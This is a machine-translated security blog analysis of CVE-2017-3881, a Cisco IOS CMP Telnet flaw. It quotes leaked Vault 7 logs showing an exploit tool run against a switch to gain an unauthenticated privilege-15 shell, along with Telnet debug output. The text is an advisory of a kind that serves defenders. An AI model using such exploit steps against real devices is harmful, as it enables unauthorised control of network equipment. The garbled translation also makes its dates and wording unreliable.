Cisco Catalyst 2960 switch in CVE-2017-3881 vulnerability analysis-vulnerability warning-the black bar safety net

!

2017 3 December 17, Cisco official website announced that the Cisco IOS&IOS-XE Software Cluster Management Protocol(Cluster Management Protocol)the presence of a remote code execution vulnerability, CVE-2017-3881-in.

The vulnerability is Cisco in the study of the CIA leak of the document“Vault 7”in the process of discovery, an attacker can unauthorized remote restart of the affected device or unauthorized code execution. Caused by the vulnerability of the main reasons is because there is no limit CMP-specific Telnet can be used only inside the local cluster of communication between members, but can be used to connect any of the affected equipment, as well as for the deformation of the CMP-specific Telnet option to set the error handling. When using a Telnet connection to an affected device, an attacker can send a variation of CMP-specific Telnet options set to build with the device connected, using this method an attacker can remotely execute arbitrary code to completely control the device or makes the device reboot.

As of this writing, Cisco is also no fix for Cluster Management Protocol remote code execution vulnerability CVE-2017-3881。

Vault 7 document discloses a remote code execution vulnerability testing process, the vulnerability does not use the source code but in the interactive mode or the Setup mode to start. Interactive mode via telnet to send the payload, and in the same telnet connection context immediately to the attacker with a command shell:

Started ROCEM interactive session - successful:
root@debian:/home/user1/ops/adverse/adverse-1r/rocem# ./ rocem_c3560-ipbase-mz.122-35.SE5.py -i 192.168.0.254
[+] Validating data/interactive. bin
[+] Validating data/set. bin
[+] Validating data/transfer. bin
[+] Validating data/unset. bin

Image: c3560-ipbase-mz. 122-35. SE5
Host: 192.168.0.254
Action: Interactive

Proceed? (y/n)y
Trying 127.0.0.1…
[] Attempting connection to host 192.168.0.254:23
Connected to 127.0.0.1.
Escape character is ‘^]’.
[+] Connection established
[] Starting the interactive session
User Access Verification
Password:
MLS-Sth#
MLS-Sth# show priv
The Current privilege level is 15
MLS-Sth#show users
Line User Host(s) Idle Location

• 1 vty 0 idle 00:00:00 192.168.221.40
  Interface User Mode Idle Peer Address
  MLS-Sth#exit
  Connection closed by foreign host.

USE setting mode, modify the switch memory for subsequent telnet unauthorized connection to do to prepare:

Test set/unset feature of ROCEM
The DUT is configured with the target configuration and network setup
The DUT is accessed by hopping through three flux nodes as per the CONOP
Reloaded the DUT to start with a clean device
From Adverse ICON machine, set ROCEM:
root@debian:/home/user1/ops/adverse/adverse-1r/rocem# ./ rocem_c3560-ipbase-mz.122-35.SE5.py -s 192.168.0.254
[+] Validating data/interactive. bin
[+] Validating data/set. bin
[+] Validating data/transfer. bin
[+] Validating data/unset. bin

Image: c3560-ipbase-mz. 122-35. SE5
Host: 192.168.0.254
Action: Set

Proceed? (y/n)y
[] Attempting connection to host 192.168.0.254:23
[+] Connection established
[] Sending Protocol Step 1
[*] Sending Protocol Step 2
[+] Done
root@debian:/home/user1/ops/adverse/adverse-1r/rocem#
Verified I could telnet and rx priv 15 without creds:
root@debian:/home/user1/ops/adverse/adverse-1r/rocem# telnet 192.168.0.254
Trying 192.168.0.254…
Connected to 192.168.0.254.
Escape character is ‘^]’.
MLS-Sth#
MLS-Sth#show priv
The Current privilege level is 15
MLS-Sth#

In the study of this vulnerability, we found one on our useful information–telnet debug output:

14. Confirm Xetron EAR 5355 - Debug telnet causes anomalous output
15. Enabled the debug telnet on DUT
16. Set ROCEM
17. Observed the following:
    000467: Jun 3 13:54:09.330: TCP2: Telnet received WILL TTY-SPEED (32) (refused)
    000468: Jun 3 13:54:09.330: TCP2: Telnet sent DONT TTY-SPEED (32)
    000469: Jun 3 13:54:09.330: TCP2: Telnet received WILL LOCAL-FLOW (33) (refused)
    000470: Jun 3 13:54:09.330: TCP2: Telnet sent DONT LOCAL-FLOW (33)
    000471: Jun 3 13:54:09.330: TCP2: Telnet received WILL LINEMODE (34)
    000472: Jun 3 13:54:09.330: TCP2: Telnet sent DONT LINEMODE (34) (unimplemented)
    000473: Jun 3 13:54:09.330: TCP2: Telnet received WILL NEW-ENVIRON (39)
    000474: Jun 3 13:54:09.330: TCP2: Telnet sent DONT NEW-ENVIRON (39) (unimplemented)
    000475: Jun 3 13:54:09.330: TCP2: Telnet received DO STATUS (5)
    000476: Jun 3 13:54:09.330: TCP2: Telnet sent WONT STATUS (5) (unimplemented)
    000477: Jun 3 13:54:09.330: TCP2: Telnet received WILL X-DISPLAY (35) (refused)
    000478: Jun 3 13:54:09.330: TCP2: Telnet sent DONT X-DISPLAY (35)
    000479: Jun 3 13:54:09.330: TCP2: Telnet received DO ECHO (1)
    000480: Jun 3 13:54:09.330: Telnet2: recv SB NAWS 116 29
    000481: Jun 3 13:54:09.623: Telnet2: recv SB 36 92 OS^K’zAuk,Fz90X
    000482: Jun 3 13:54:09.623: Telnet2: recv SB 36 0 ^CCISCO_KITS^Ap

Note that the last line received CISCO_KITS of the option, the time to prove that this is an important string.

According to Cisco’s current published case, a total of 318 products affected by this vulnerability, a detailed list of products please see Appendix,

Currently the following only two products are not affected by this vulnerability:

1. Running Cisco IOS Software, but not in the affected list of devices is not affected.

2. Running Cisco IOS XE Software but does not include a CMP Protocol subsystem of the product is not affected.

CVE-2017-3881 the detection method

[1] [2] [3] [4] [5] next